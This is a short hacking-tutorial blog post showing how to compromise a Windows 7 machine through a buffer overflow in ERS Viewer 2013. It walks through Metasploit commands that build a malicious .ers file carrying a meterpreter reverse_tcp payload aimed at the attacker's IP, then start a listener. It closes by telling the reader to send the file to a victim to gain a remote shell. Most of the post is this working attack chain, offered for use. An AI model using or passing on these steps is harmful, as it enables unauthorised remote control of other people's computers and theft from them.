This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
Exploit Targets
ERS Viewer 2013
Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Open Kali Linux terminal type msfconsole
Now type use exploit/windows/fileformat/erdas_er_viewer_rf_report_error
msf exploit (erdas_er_viewer_rf_report_error)>set payload windows/meterpreter/reverse_tcp
msf exploit (erdas_er_viewer_rf_report_error)>set lhost 192.168.1.164 (IP of Local Host)
msf exploit (erdas_er_viewer_rf_report_error)>exploit
After we successfully generate the malicious ers File, it will stored on your local computer
/root/.msf4/local/msf.ers
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.164
exploit
Now send your msf.ers files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
The post Hack Windows 7 PC Remotely using ERS Viewer 2013 ERS File Handling Buffer Overflow appeared first on Hacking Articles.